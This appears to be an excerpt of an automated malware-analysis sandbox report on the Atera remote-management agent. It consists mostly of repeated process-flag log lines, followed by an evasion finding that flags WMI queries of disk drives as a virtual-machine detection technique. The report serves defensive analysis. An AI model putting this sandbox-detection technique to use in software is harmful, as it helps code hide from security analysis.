                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX

                                Malware Analysis System Evasion

                                barindex
                                Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDrive
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\ROOT\cimv2:Win32_DiskDrive.DeviceID=&quot;\\\\.\\PHYSICALDRIVE0&quot;} where resultclass = Win32_DiskPartition
